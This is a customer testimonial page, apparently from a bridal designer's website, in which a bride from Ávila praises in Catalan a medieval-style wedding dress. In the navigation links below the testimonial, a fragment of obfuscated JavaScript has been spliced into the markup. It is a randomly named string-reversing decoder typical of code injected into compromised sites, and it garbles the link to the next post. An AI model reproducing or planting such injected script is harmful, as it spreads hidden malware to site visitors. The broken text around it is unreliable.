Esther d’ÁVILA

Posted on by on February 11th, 2014 | 0 Comments »

Esther de AVILA

El vestit de núvia medieval Reina em va imressionar només veure’l a la vostra web y després… quan me’l vaig emprovar en el  vostre taller de disseny ya no vaig dudar. Era el meu vestit de núvia perfecte.  Vaig anar com una princesa medieval  durant un dia gracias als teus meravellosos dissenys.

 

Al meu marit li va encantar y a tots els convidats al casament, que van dir que era un vestit de núvia ideal per a mi. Va valer la pena viatjar des de’Àvila.

 

Una abraçada Lluïsa i gràcies per tot!!!

« $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("/">Patricia de SANTANDER
Ana Belén de CIUDAD REAL »

No Comments


*